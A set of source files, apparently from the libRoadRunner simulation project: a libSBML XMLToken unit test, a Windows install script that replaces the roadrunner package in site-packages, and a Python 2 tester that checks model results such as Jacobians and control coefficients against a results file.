self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
i = token.removeAttr( "name7")
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
i = token.removeAttr( "name7", "namespaces7")
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
i = token.removeAttr(xt1)
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( token.getAttributes().getLength() == 4 )
i = token.removeAttr(3)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributes().getLength() == 3 )
i = token.removeAttr( "name1")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributes().getLength() == 2 )
i = token.removeAttr( "name2", "http://name1.org/")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributes().getLength() == 1 )
i = token.removeAttr(xt2)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributes().getLength() == 0 )
_dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ xt2 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_removeNamespaces(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
token.addNamespace( "http://test1.org/", "test1")
self.assert_( token.getNamespacesLength() == 1 )
i = token.removeNamespace(4)
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( token.getNamespacesLength() == 1 )
i = token.removeNamespace(0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 0 )
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_removeNamespaces1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
token.addNamespace( "http://test1.org/", "test1")
self.assert_( token.getNamespacesLength() == 1 )
i = token.removeNamespace( "test2")
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( token.getNamespacesLength() == 1 )
i = token.removeNamespace( "test1")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 0 )
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setAttributes1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
nattr = libsbml.XMLAttributes()
xt1 = libsbml.XMLTriple("name1", "http://name1.org/", "p1")
nattr.add(xt1, "val1")
i = token.setAttributes(nattr)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isAttributesEmpty() == False )
_dummyList = [ nattr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setAttributes2(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken(triple)
nattr = libsbml.XMLAttributes()
xt1 = libsbml.XMLTriple("name1", "http://name1.org/", "p1")
nattr.add(xt1, "val1")
i = token.setAttributes(nattr)
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.isAttributesEmpty() == True )
_dummyList = [ nattr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setEOF(self):
token = libsbml.XMLToken()
self.assert_( token.isEnd() == False )
i = token.setEOF()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isEnd() == False )
self.assert_( token.isStart() == False )
self.assert_( token.isText() == False )
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setEnd(self):
token = libsbml.XMLToken()
self.assert_( token.isEnd() == False )
i = token.setEnd()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isEnd() == True )
i = token.unsetEnd()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isEnd() == False )
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setNamespaces1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
ns = libsbml.XMLNamespaces()
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
ns.add( "http://test1.org/", "test1")
i = token.setNamespaces(ns)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 1 )
self.assert_( token.isNamespacesEmpty() == False )
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setNamespaces2(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken(triple)
ns = libsbml.XMLNamespaces()
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
ns.add( "http://test1.org/", "test1")
i = token.setNamespaces(ns)
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setTriple1(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken()
i = token.setTriple(triple)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_(( "test" == token.getName() ))
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setTriple2(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken("This is text")
i = token.setTriple(triple)
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestXMLToken_newSetters))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: wrappers/Python/install_roadrunner_win.py
```python
import site
import shutil
import os.path
import os
def rmroadrunner(path):
print('deleting roadrunner from ' + path)
try:
os.remove(os.path.join(path, 'roadrunner.py'))
except:
pass
try:
os.remove(os.path.join(path, 'roadrunner.pyc'))
except:
pass
try:
os.remove(os.path.join(path, '_roadrunner.pyd'))
except:
pass
try:
os.remove(os.path.join(path, '_roadrunner.so'))
except:
pass
shutil.rmtree(os.path.join(path, 'roadrunner'), ignore_errors=True)
splist = site.getsitepackages()
sp = ''
for s in splist:
rmroadrunner(s)
if s.find('site-packages') > 0:
sp = s
print('installing roadrunner to site packages dir: ' + sp)
dst = os.path.join(sp, 'roadrunner')
# src dir should be location of the roadunner package, i.e.
# src directory is :c:\Users\IEUser\local\site-packages\roadrunner
# need to get relative to this file as cwd may be different than
# dir the file dir if its say run from desktop.
cwd = os.path.dirname(os.path.abspath(__file__))
src = os.path.abspath(os.path.join(cwd, 'site-packages', 'roadrunner'))
print('src directory is :' + src)
print("destination directory is: " + dst)
shutil.copytree(src, dst)
```
#### File: roadrunner/testing/tester.py
```python
import sys
import random
import string
import roadrunner
from numpy import *
import os
# Module wide file handle
fHandle = ''
rpadding = 45
sbmlStr = ''
JarnacStr = ''
def defaultTestFilePath():
"""
get the full path of the default data file
"""
me = os.path.realpath(__file__)
base = os.path.split(me)[0]
testfile = os.path.join(base, 'results_roadRunnerTest_1.txt')
if os.path.isfile(testfile):
return testfile
else:
raise Exception('instalation error, test file, ' + testfile + ' does not exist')
# --------------------------------------------------------------------------
# SUPPORT ROUTINES
# --------------------------------------------------------------------------
def expectApproximately (a, b, tol):
diff = a - b
return abs(diff) < tol
def passMsg (errorFlag):
if errorFlag:
return "*****FAIL*****"
else:
return "PASS"
# Empty lines are ignored
# Lines starting with # are also ignored
def readLine ():
line = fHandle.readline()
while line == '\n':
line = fHandle.readline()
while line == '':
line = fHandle.readline()
while (line[0] == '#') or (line == '') or (line[0] == '\n'):
if line == '':
return line
line = fHandle.readline();
return line.strip('\n')
def jumpToNextTest():
line = readLine()
#line = ''
#while line == '':
# line = fHandle.readline().strip ('\n')
while line[0] != '[':
line = readLine()
return line
def getSBMLStr ():
sbmlStr = ''
line = fHandle.readline()
while (line != '[END_MODEL]' + '\n'):
sbmlStr = sbmlStr + line
line = fHandle.readline()
return sbmlStr
def getJarnacStr ():
JarnacStr = ''
line = fHandle.readline()
while (line != '[END_MODEL]' + '\n'):
JarnacStr = JarnacStr + line
line = fHandle.readline()
return JarnacStr
def loadSBMLModelFromTestFile ():
testId = jumpToNextTest()
if testId == '[SBML]':
return getSBMLStr ()
def loadJarnacModelFromTestFile ():
testId = jumpToNextTest ()
if testId == '[JARNAC]':
return getJarnacStr ()
# ------------------------------------------------------------------------
# TESTS START HERE
# ------------------------------------------------------------------------
def setConservationLaw(rrInstance, testId):
line = readLine ()
if line == 'True':
rrInstance.conservedMoietyAnalysis = True
else:
rrInstance.conservedMoietyAnalysis = False
def mySetSteadyStateSelectionList(rrInstance, testId):
line = readLine ()
words = line.split()
rrInstance.steadyStateSelections = words
def myComputeSteadyState(rrInstance, testId):
line = readLine ()
if line == "True":
print "Compute Steady State, distance to SteadyState:", rrInstance.steadyState()
def checkSpeciesConcentrations(rrInstance, testId):
words = []
species = []
m = rrInstance.model.getNumFloatingSpecies()
for i in range (0,m):
line = readLine ()
words = line.split()
words.append (rrInstance.model[words[0]])
species.append (words)
# Steady State Concentrations
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
for i in range (0,m):
expectedValue = float (species[i][1])
if expectApproximately (expectedValue, species[i][2], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkFluxes(rrInstance, testId):
words = []
fluxes = []
# Steady State Fluxes
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
n = rrInstance.model.getNumReactions();
for i in range (0,n):
line = readLine ()
words = line.split()
words.append (rrInstance.model[words[0]])
fluxes.append (words)
for i in range (0,n):
expectedValue = float (fluxes[i][1])
if expectApproximately (expectedValue, fluxes[i][2], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkFullJacobian(rrInstance, testId):
# Jacobian
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
Jacobian = rrInstance.getFullJacobian()
for i in range(0,m):
line = readLine ()
words = line.split()
for j in range(0,m):
expectedValue = float(words[j])
if expectApproximately (expectedValue, Jacobian[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkIndividualEigenvalues(rrInstance, testId):
# Eigenvalues
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
try:
for i in range(0,m):
line = readLine ()
words = line.split()
eigenvalueName = words[0]
realPart = rrInstance.getValue ('eigen(' + eigenvalueName + ')')
realPart = float (realPart)
if expectApproximately (realPart, float(words[1]), 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
except Exception, e:
print('Unexpected error in checkIndividualEigenvalues:' + str(e))
def checkEigenvalueMatrix(rrInstance, testId):
# Eigenvalues
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
eigenvalues = rrInstance.getEigenvalues()
for i in range(0,m):
line = readLine ()
words = line.split()
realPart = float (words[0])
# Check if there is an imaginary part
if len (words) == 1:
imagPart = 0
else:
imagPart= float (words[1])
if (expectApproximately (realPart, eigenvalues[i,0], 1E-6) == False) or (expectApproximately (imagPart, eigenvalues[i,1], 1E-6)) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkStoichiometryMatrix(rrInstance, testId):
# Stoichiometry matrix
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
n = rrInstance.model.getNumReactions();
st = rrInstance.model.getStoichiometryMatrix()
for i in range(0,m):
line = readLine ()
words = line.split()
for j in range(0,n):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkLinkMatrix(rrInstance, testId):
# Link matrix
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
st = rrInstance.getLinkMatrix()
for i in range(0,m):
words = readLine ().split()
for j in range(0,m):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkUnscaledConcentrationControlMatrix(rrInstance, testId):
# Unscaled Concentration Control matrix
print string.ljust ("Check " + testId, rpadding),
words = []
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
n = rrInstance.model.getNumReactions();
st = rrInstance.getUnscaledConcentrationControlCoefficientMatrix();
for i in range(0,m):
words = readLine ().split()
for j in range(0,n):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkScaledConcentrationControlMatrix(rrInstance, testId):
# Unscaled Concentration Control matrix
print string.ljust ("Check " + testId, rpadding),
words = []
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
n = rrInstance.model.getNumReactions();
st = rrInstance.getScaledConcentrationControlCoefficientMatrix();
for i in range(0,m):
words = readLine ().split()
for j in range(0,n):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkUnscaledFluxControlCoefficientMatrix(rrInstance, testId):
# Unscaled Flux Control matrix
print string.ljust ("Check " + testId, rpadding),
words = []
errorFlag = False
n = rrInstance.model.getNumReactions();
st = rrInstance.getUnscaledFluxControlCoefficientMatrix();
for i in range(0,n):
words = readLine ().split()
for j in range(0,n):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkScaledFluxControlCoefficientMatrix(rrInstance, testId):
# Unscaled Flux Control matrix
print string.ljust ("Check " + testId, rpadding),
words = []
errorFlag = False
n = rrInstance.model.getNumReactions();
st = rrInstance.getScaledFluxControlCoefficientMatrix()
for i in range(0,n):
words = readLine ().split()
for j in range(0,n):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkUnscaledElasticityMatrix(rrInstance, testId):
# Jacobian
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
uee = rrInstance.getUnscaledElasticityMatrix()
for i in range(0,m):
line = readLine ()
words = line.split()
for j in range(0,m):
expectedValue = float(words[j])
if expectApproximately (expectedValue, uee[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkScaledElasticityMatrix(rrInstance, testId):
# Jacobian
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
ee = rrInstance.getScaledElasticityMatrix()
for i in range(0,m):
line = readLine ()
words = line.split()
for j in range(0,m):
expectedValue = float(words[j])
if expectApproximately (expectedValue, ee[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkGetFloatingSpeciesIds(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getFloatingSpeciesIds()
m = rrInstance.model.getNumFloatingSpecies()
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkGetBoundarySpeciesIds(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getBoundarySpeciesIds()
m = rrInstance.model.getNumBoundarySpecies()
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkGetGlobalParameterIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getGlobalParameterIds()
m = rrInstance.model.getNumGlobalParameters()
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkGetCompartmentIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getCompartmentIds()
m = rrInstance.model.getNumCompartments()
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkReactionIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getReactionIds()
m = rrInstance.model.getNumReactions();
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkFloatingSpeciesInitialConditionIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
line = readLine ()
words = line.split()
expected = rrInstance.model.getFloatingSpeciesInitAmountIds()
print passMsg (words != expected)
def checkEigenValueIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.getEigenvalueIds()
m = rrInstance.model.getNumFloatingSpecies()
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkGetRatesOfChangeIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getFloatingSpeciesAmountRateIds()
print passMsg (expected != words)
def checkSetSteadyStateSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
m = rrInstance.model.getNumFloatingSpecies()
words = line.split()
result = rrInstance.steadyStateSelections = words
if result == False:
errorFlag = True
print passMsg (errorFlag)
def checkGetSteadyStateSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
result = str(rrInstance.steadyStateSelections)
print passMsg (result == words)
def checkSetTimeCourseSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
result = rrInstance.selections = words
if result == False:
errorFlag = True
print passMsg (errorFlag)
def checkGetTimeCourseSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
result = str(rrInstance.selections)
print passMsg (result == words)
def checkComputeSteadyStateValues(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
list = rrInstance.steadyStateSelections
ss = rrInstance.computeSteadyStateValues()
words = readLine().split()
for i in range (len (list)):
if expectApproximately(float (words[i]), ss[i], 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkFloatingSpeciesConcentrations(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
ss = rrInstance.model.getFloatingSpeciesConcentrations()
words = readLine().split()
for i in range (len (ss)):
if expectApproximately(float (words[i]), ss[i], 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkBoundarySpeciesConcentrations(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
ss = rrInstance.model.getBoundarySpeciesConcentrations()
words = readLine().split()
for i in range (len (ss)):
if expectApproximately(float (words[i]), ss[i], 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkGlobalParameterValues(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
ss = rrInstance.model.getGlobalParameterValues()
words = readLine().split()
for i in range (len (ss)):
if expectApproximately(float (words[i]), ss[i], 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkInitalFloatingSpeciesConcentations(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
ss = rrInstance.model.getFloatingSpeciesInitConcentrations()
words = readLine().split()
same = len(words) == len(ss) and \
len(words) == sum([1 for i,j in zip(words,ss) if expectApproximately(float (i), j, 1E-6)])
print passMsg (not same)
def checkReactionRates(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
ss = rrInstance.model.getReactionRates()
words = readLine().split()
for i in range (len (ss)):
if expectApproximately(float (words[i]), ss[i], 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkGetReactionRatesByIndex(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
words = readLine().split()
n = rrInstance.model.getNumReactions()
for i in range (n):
value = rrInstance.model.getReactionRate (i)
if expectApproximately(float (words[i]), value, 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkNumberOfDependentSpecies(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = int (readLine())
n = rrInstance.model.getNumDepFloatingSpecies()
if n != value:
errorFlag = True
print passMsg (errorFlag)
def checkNumberOfIndependentSpecies(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = int (readLine())
n = rrInstance.model.getNumIndFloatingSpecies()
if n != value:
errorFlag = True
print passMsg (errorFlag)
def checkInitialConditions(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
words = readLine().split()
values = rrInstance.model.getFloatingSpeciesInitConcentrations()
for i in range(len(words)):
if expectApproximately (float (words[i]), values[i], 1E-6) == False:
errorFlag = True
print passMsg (errorFlag)
def checkNumberOfRules(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = int (readLine())
if rrInstance.getNumRules() != value:
errorFlag = True
print passMsg (errorFlag)
def checkGetRatesOfChange(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
words = readLine().split()
values = rrInstance.model.getRatesOfChange()
for i in range (len(words)):
if expectApproximately (float (words[i]), values[i], 1E-6) == False:
errorFlag = True
print passMsg (errorFlag)
def checkGetReactionRatesEx (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
inputConcs = asarray (readLine().split(), dtype=float64)
values = rrInstance.getReactionRatesEx (inputConcs)
outputRates = asarray (readLine().split(), dtype=float64)
if not allclose (values, outputRates):
errorFlag = True
print passMsg (errorFlag)
def checkGetRatesOfChangeEx (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
inputConcs = asarray (readLine().split(), dtype=float64)
values = rrInstance.model.getRatesOfChangeEx (inputConcs)
outputRates = asarray (readLine().split(), dtype=float64)
if not allclose (values, outputRates):
errorFlag = True
print passMsg (errorFlag)
def checkRateRateOfChangeByIndex(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
inputConcs = asarray (readLine().split(), dtype=float64)
outputRates = asarray (readLine().split(), dtype=float64)
rrInstance.setFloatingSpeciesConcentrations (inputConcs)
for i in range (len (inputConcs)):
value = rrInstance.getRateOfChange (i)
if expectApproximately (value, outputRates[i], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
# ---------------------------------------------------------------------------
def setGetValues(rrInstance, IdList, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
for i in range (len(IdList)):
value = random.random()*10
rrInstance.model[dList[i]] = value
if expectApproximately (rrInstance.model[IdList[i]], value, 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def setGetTimeStart(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = random.random ()*10
rrInstance.setTimeStart (value)
if expectApproximately (rrInstance.getTimeStart (), value, 1E-6) == False:
errorFlag = True
print passMsg (errorFlag)
def setGetTimeEnd(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = random.random ()*10
rrInstance.setTimeEnd (value)
if expectApproximately (rrInstance.getTimeEnd (), value, 1E-6) == False:
errorFlag = True
print passMsg (errorFlag)
def setGetNumberOfPoints(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = random.randint (1, 100)
rrInstance.setNumPoints (value)
if rrInstance.getNumPoints () != value:
errorFlag = True
print passMsg (errorFlag)
def setGetTimeCourseSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
myList = rrInstance.getFloatingSpeciesIds()
newList = list (myList)
random.shuffle (newList)
rrInstance.setTimeCourseSelectionList (newList)
if rrInstance.getTimeCourseSelectionList() != newList:
errorFlag = True
print passMsg (errorFlag)
def setGetSteadyStateSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
myList = rrInstance.getFloatingSpeciesIds()
newList = list (myList)
while newList == myList:
random.shuffle (newList)
rrInstance.setSteadyStateSelectionList (newList)
getList = rrInstance.getSteadyStateSelectionList()
if getList != newList:
errorFlag = True
print passMsg (errorFlag)
def setGetFloatingSpeciesByIndex(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
n = rrInstance.getNumFloatingSpecies()
for i in range (n):
value = random.random()*10
rrInstance.setFloatingSpeciesByIndex (i, value)
if expectApproximately(rrInstance.getFloatingSpeciesByIndex (i), value, 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def setGetBoundarySpeciesByIndex(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
n = rrInstance.getNumBoundarySpecies()
for i in range (n):
value = random.random()*10
rrInstance.setBoundarySpeciesByIndex (i, value)
if expectApproximately(rrInstance.getBoundarySpeciesByIndex (i), value, 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def setGetCompartmentByIndex(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
n = rrInstance.getNumCompartments()
for i in range (n):
value = random.random()*10
rrInstance.setCompartmentByIndex (i, value)
if expectApproximately(rrInstance.getCompartmentByIndex (i), value, 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def setGetGlobalParameterByIndex (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
n = rrInstance.getNumberOfGlobalParameters()
for i in range (n):
value = random.random()*10
rrInstance.setGlobalParameterByIndex (i, value)
if expectApproximately(rrInstance.getGlobalParameterByIndex (i), value, 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def setGetFloatingSpeciesConcentrations (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
getArray = rrInstance.getFloatingSpeciesConcentrations()
setArray = zeros(len(getArray))
for i in range(len(getArray)):
value = random.random()*10
setArray[i] = value
rrInstance.setFloatingSpeciesConcentrations (setArray)
if (setArray != rrInstance.getFloatingSpeciesConcentrations()).all():
errorFlag = True
print passMsg (errorFlag)
def setGetBoundarySpeciesConcentrations (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
getArray = rrInstance.getBoundarySpeciesConcentrations()
setArray = zeros(len(getArray))
for i in range(len(getArray)):
value = random.random()*10
setArray[i] = value
rrInstance.setBoundarySpeciesConcentrations (rrInstance.PythonArrayTorrVector (setArray))
if (setArray != rrInstance.getBoundarySpeciesConcentrations()).all():
errorFlag = True
print passMsg (errorFlag)
def setGetInitialFloatingSpeciesConcentrations (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
getArray = rrInstance.getFloatingSpeciesInitialConcentrations ()
setArray = zeros(len(getArray))
for i in range(len(getArray)):
value = random.random()*10
setArray[i] = value
rrInstance.setFloatingSpeciesInitialConcentrations (setArray)
if (setArray != rrInstance.getFloatingSpeciesInitialConcentrations()).all():
errorFlag = True
print passMsg (errorFlag)
def setGetReset(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
values = zeros (rrInstance.getNumberOfFloatingSpecies())
for i in range (len (values)):
values[i] = random.random()*10
initial = rrInstance.getFloatingSpeciesInitialConcentrations()
rrInstance.setFloatingSpeciesConcentrations (values)
# Should reset the floats by to the current initial condition
rrInstance.reset()
values = rrInstance.getFloatingSpeciesConcentrations()
if(values != initial).all():
errorFlag = True
print passMsg (errorFlag)
def scriptTests():
print
print "Testing Set and Get Functions"
print "-----------------------------"
setGetValues(rrInstance.getFloatingSpeciesIds(), 'Set/Get Value (Floats)')
setGetValues(rrInstance.getBoundarySpeciesIds(), 'Set/Get Value (Boundary)')
setGetValues(rrInstance.getGlobalParameterIds(), 'Set/Get Value (Global Parameters)')
setGetValues(rrInstance.getCompartmentIds(), 'Set/Get Value (Compartments)')
setGetTimeStart('Set/Get TimeStart')
setGetTimeEnd ('Set/Get TimeEnd')
setGetNumberOfPoints ('Set/Get Number Of Points')
